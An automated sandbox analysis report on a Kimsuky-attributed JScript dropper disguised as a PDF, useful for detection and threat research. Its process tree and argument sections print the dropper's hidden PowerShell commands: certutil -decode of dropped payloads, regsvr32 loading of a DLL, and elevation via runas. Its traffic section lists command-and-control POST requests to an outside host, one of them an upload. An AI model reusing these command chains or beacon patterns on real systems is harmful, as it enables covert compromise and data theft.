
Windows Analysis Report x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse

Overview

General Information

Sample Name: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
Analysis ID: 1558048
MD5: 8b274243a5179028388a2c17c75afb9f
SHA1: d5c09a6fff4dee7dee7f302c1d4d586ba6bc83f2
SHA256: 20eff877aeff0afaa8a5d29fe272bdd61e49779b9e308c4a202ad868a901a5cd

Detection

Kimsuky
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Kimsuky
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
JavaScript source code contains functionality to generate code involving a shell, file or stream
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Uses an obfuscated file name to hide its real file extension (double extension)
Uses certutil -decode
Queries the volume information (name, serial number etc) of a device
Yara signature match
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Contains capabilities to detect virtual machines
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
Found WSH timer for Javascript or VBS script (likely evasive script)

Process Tree

  • System is w10x64_office
  • wscript.exe (PID: 7044 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • AcroRd32.exe (PID: 3380 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\ProgramData\ 2021-05-07.pdf' MD5: 84E2B28A5B7221B3AAB82CD7CA4D6619)
      • AcroRd32.exe (PID: 5476 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\ProgramData\ 2021-05-07.pdf' MD5: 84E2B28A5B7221B3AAB82CD7CA4D6619)
      • RdrCEF.exe (PID: 3972 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16514043 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 6412 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=83FD662E69ECF919D8944D885F919F9E --mojo-platform-channel-handle=1612 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 5892 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 3812 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 5132 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 6260 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
        • RdrCEF.exe (PID: 2764 cmdline: 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2 MD5: C4531F5D235167293675FF6CE5472440)
    • powershell.exe (PID: 304 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • certutil.exe (PID: 1736 cmdline: 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: EB199893441CED4BBBCB547FE411CF2D)
    • powershell.exe (PID: 4168 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • regsvr32.exe (PID: 5280 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9a MD5: D78B75FC68247E8A63ACBA846182740E)
        • cmd.exe (PID: 4772 cmdline: C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 4152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 1252 cmdline: C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.bat MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • regsvr32.exe (PID: 5276 cmdline: regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
          • powershell.exe (PID: 5740 cmdline: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)
            • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • regsvr32.exe (PID: 2052 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 2792 cmdline: 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
    • powershell.exe (PID: 2324 cmdline: powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • regsvr32.exe (PID: 380 cmdline: 'C:\Windows\system32\regsvr32.exe' /s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 1328 cmdline: 'C:\Windows\system32\regsvr32.exe' /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
Rule: SUSP_Double_Base64_Encoded_Executable
Description: Detects an executable that has been encoded with base64 twice
Author: Florian Roth
Strings:
  • 0x1af9e1b:$: VFZxUUFBT

Dropped Files

Source: C:\Users\user\Documents\20210825\PowerShell_transcript.910646.c593w7K1.20210825105827.txt
Rule: Certutil_Decode_OR_Download
Description: Certutil Decode
Author: Florian Roth
Strings:
  • 0x14d:$a1: certutil -decode
  • 0x32b:$a1: certutil -decode

Source: C:\ProgramData\temp\1673.tmp-PowerShell_transcript.910646.c593w7K1.20210825105827.txt
Rule: Certutil_Decode_OR_Download
Description: Certutil Decode
Author: Florian Roth
Strings:
  • 0x14d:$a1: certutil -decode
  • 0x32b:$a1: certutil -decode

Memory Dumps

Source: 00000000.00000002.562447318.0000027E99742000.00000004.00000001.sdmp
Rule: Certutil_Decode_OR_Download
Description: Certutil Decode
Author: Florian Roth
Strings:
  • 0x1910:$a1: certutil -decode

Source: 00000000.00000003.536073175.0000027E9967A000.00000004.00000001.sdmp
Rule: Certutil_Decode_OR_Download
Description: Certutil Decode
Author: Florian Roth
Strings:
  • 0x2b0ee:$a1: certutil -decode

Source: 00000000.00000003.537403999.0000027E996A4000.00000004.00000001.sdmp
Rule: Certutil_Decode_OR_Download
Description: Certutil Decode
Author: Florian Roth
Strings:
  • 0x10ee:$a1: certutil -decode

Source: 00000004.00000002.445490921.0000022E1F0E2000.00000004.00000020.sdmp
Rule: Certutil_Decode_OR_Download
Description: Certutil Decode
Author: Florian Roth
Strings:
  • 0x53324:$a1: certutil -decode
  • 0x59f72:$a1: certutil -decode

Source: 00000021.00000003.657307580.0000000004F17000.00000004.00000001.sdmp
Rule: Certutil_Decode_OR_Download
Description: Certutil Decode
Author: Florian Roth
Strings:
  • 0xa35:$a1: certutil -decode
  • 0xc13:$a1: certutil -decode

(5 of 46 memory dump entries shown)

Unpacked PEs

Source: 24.2.regsvr32.exe.7ff983d00000.1.unpack
Rule: JoeSecurity_Kimsuky
Description: Yara detected Kimsuky
Author: Joe Security

Source: 13.2.regsvr32.exe.7ff983d90000.1.unpack
Rule: JoeSecurity_Kimsuky
Description: Yara detected Kimsuky
Author: Joe Security

Source: 19.2.regsvr32.exe.7ff983d00000.1.unpack
Rule: JoeSecurity_Kimsuky
Description: Yara detected Kimsuky
Author: Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview
AV Detection:

Multi AV Scanner detection for submitted file
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse Virustotal: Detection: 12%
Multi AV Scanner detection for domain / URL
Source: texts.letterpaper.press Virustotal: Detection: 11%
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll Metadefender: Detection: 29%
Source: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll ReversingLabs: Detection: 67%
Source: C:\ProgramData\glK7UwV.pR9a Metadefender: Detection: 29%
Source: C:\ProgramData\glK7UwV.pR9a ReversingLabs: Detection: 67%
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983D989D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,13_2_00007FF983D989D0
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983DE3028 CryptImportKey,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,13_2_00007FF983DE3028
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983DE3030 CryptEncrypt,SetEndOfFile,RtlSizeHeap,GetProcessHeap,SetEnvironmentVariableW,13_2_00007FF983DE3030
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983D98D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,13_2_00007FF983D98D10
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D089D0 CryptAcquireContextW,CryptGenRandom,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptAcquireContextW,CryptImportKey,CryptEncrypt,CryptReleaseContext,_fread_nolock,CryptEncrypt,CryptDestroyKey,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,19_2_00007FF983D089D0
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D53028 CryptImportKey,19_2_00007FF983D53028
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D53030 CryptEncrypt,19_2_00007FF983D53030
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D08D10 _fread_nolock,_fread_nolock,CryptAcquireContextW,CryptImportKey,CryptDecrypt,CryptReleaseContext,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDeriveKey,_fread_nolock,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,CryptDestroyKey,19_2_00007FF983D08D10
Source: C:\Windows\System32\regsvr32.exe File opened (drive letters probed, in the order observed): z:, x:, v:, t:, r:, p:, n:, l:, j:, h:, f:, d:, b:, y:, w:, u:, s:, q:, o:, m:, k:, i:, g:, e:, c:, a:
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983DE3188 FindFirstFileW,13_2_00007FF983DE3188
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983DB66E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,13_2_00007FF983DB66E0
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983DD84FC FindFirstFileExW,13_2_00007FF983DD84FC
Source: C:\Windows\System32\regsvr32.exe Code function: 13_2_00007FF983DB6BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF983DB6BB0
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D53188 FindFirstFileW,19_2_00007FF983D53188
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D266E0 FindFirstFileW,FindNextFileW,WideCharToMultiByte,GetLastError,FindClose,FindClose,19_2_00007FF983D266E0
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D484FC FindFirstFileExW,19_2_00007FF983D484FC
Source: C:\Windows\System32\regsvr32.exe Code function: 19_2_00007FF983D26BB0 FindFirstFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,19_2_00007FF983D26BB0

Software Vulnerabilities:

JavaScript source code contains functionality to generate code involving a shell, file or stream
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse Argument value: ['"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse Argument value: ['"powershell.exe -windowstyle hidden regsvr32.exe /s C:\\Windows\\..\\ProgramData\\glK7UwV.pR9a",0,true', '"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']
Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse Argument value: ['"powershell.exe -windowstyle hidden regsvr32.exe /s C:\\Windows\\..\\ProgramData\\glK7UwV.pR9a",0,true', '"Scripting.FileSystemObject"', '"powershell.exe -windowstyle hidden certutil -decode C:\\Windows\\..\\ProgramData\\efVo8cq.sIhn C:\\Windo']
Source: Joe Sandbox View ASN Name: AMAZON-AESUS
Source: Joe Sandbox View IP Address: 50.17.5.224
Source: global traffic HTTP traffic detected (the same request is repeated several times during the analysis):
POST //?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: texts.letterpaper.press
Content-Length: 0
Cache-Control: no-cache

Source: global traffic HTTP traffic detected (the same request is repeated several times during the analysis):
POST //?m=c&p1=8ace1190 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: texts.letterpaper.press
Content-Length: 0
Cache-Control: no-cache

Source: global traffic HTTP traffic detected:
POST //?m=b&p1=8ace1190&p2=c HTTP/1.1
Content-Type: multipart/form-data; boundary=--7263b57d61acd27d98a454fc484795fe0106d5
Content-Length: 45838
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: texts.letterpaper.press
Connection: Keep-Alive
Cache-Control: no-cache
Source: powershell.exe, 00000004.00000002.454312297.0000022E38F9E000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.519223308.000001ACA52BD000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.452083262.0000022E20FB9000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000002.496611128.000001AC8D2AF000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: regsvr32.exe, 00000021.00000003.652397191.0000000003C79000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.864475950.00000000037CE000.00000004.00000001.sdmp, regsvr32.exe, 00000021.00000003.966324102.0000000001389000.00000004.00000001.sdmp String found in binary or memory: http://texts.letterpaper.press//?m=a&p1=8ace1190&p2=Win10.0.17134x64-S_Regsvr32-v2.0.69
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=c
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=b&p1=8ace1190&p2=cf
        Source: regsvr32.exe, 00000021.00000003.1009212871.0000000004DB6000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=c&p1=8ace1190
        Source: regsvr32.exe, 00000021.00000003.878428282.0000000003814000.00000004.00000001.sdmp | String found in binary or memory: http://texts.letterpaper.press//?m=d&p1=8ace1190